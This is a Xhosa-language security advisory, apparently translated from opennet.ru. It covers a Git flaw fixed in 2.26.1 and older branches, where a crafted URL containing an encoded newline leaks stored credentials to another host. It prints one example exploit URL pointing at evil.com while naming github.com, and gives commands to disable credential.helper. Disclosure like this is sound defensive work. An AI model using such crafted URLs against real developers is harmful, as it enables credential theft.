ukukhutshwa kokulungiswa kwenkqubo yokulawula umthombo osasaziweyo weGit 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 kunye ne-2.17.4, kwi eyaphelisa () kumphathi"", ebangela ukuba iziqinisekiso zithunyelwe kumamkeli ongalunganga xa umxhasi wegit efikelela kwindawo yokugcina esebenzisa i-URL efomathwe ngokukodwa equlethe unobumba omtsha. Ubuthathaka bunokusetyenziswa ukulungiselela iziqinisekiso ezisuka komnye umkhosi ukuba zithunyelwe kumncedisi olawulwa ngumhlaseli.
Xa ukhankanya i-URL efana ne βhttps://evil.com?%0ahost=github.com/β, isibambi senkcazi xa uqhagamshelana nenginginya evil.com iyakugqitha uqinisekiso lweeparamitha ezikhankanyiweyo kwi github.com. Ingxaki yenzeka xa kusenziwa imisebenzi efana ne "git clone", kuquka ukusetyenzwa kwee-URL zeemodyuli ezisezantsi (umzekelo, "uhlaziyo lwemodyuli esezantsi ye-git" iya kuqhubekekisa ngokuzenzekelayo ii-URL ezichazwe kwifayile ye.gitmodules kwindawo yokugcina). Ubuthathaka buyingozi kakhulu kwiimeko apho umphuhlisi edibanisa indawo yokugcina ngaphandle kokubona i-URL, umzekelo, xa usebenza kunye neemodyuli ezisezantsi, okanye kwiinkqubo ezenza izenzo ezizenzekelayo, umzekelo, kwizikripthi zokwakha iphakheji.
Ukuvala ubuthathaka kwiinguqulelo ezintsha Ukugqithisa umlinganiswa omtsha kuwo nawaphi na amaxabiso ahanjiswa ngeprotocol yotshintshiselwano lwesiqinisekiso. Ukusasaza, unokulandelela ukukhutshwa kohlaziyo lwephakheji kumaphepha , , , , , , .
Njengendlela yokusombulula ingxaki Musa ukusebenzisa i-credential.helper xa ufikelela kwiindawo zokugcina zikawonke-wonke kwaye ungasebenzisi "git clone" kwimo "--recurse-submodules" eneendawo zokugcina ezingakhangelwanga. Ukuvala ngokupheleleyo i-credential.helper handler, eyenza kunye nokufumana amagama ayimfihlo ukusuka , ekhuselweyo okanye ifayile enamagama agqithisiweyo, ungasebenzisa imiyalelo:
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
umthombo: opennet.ru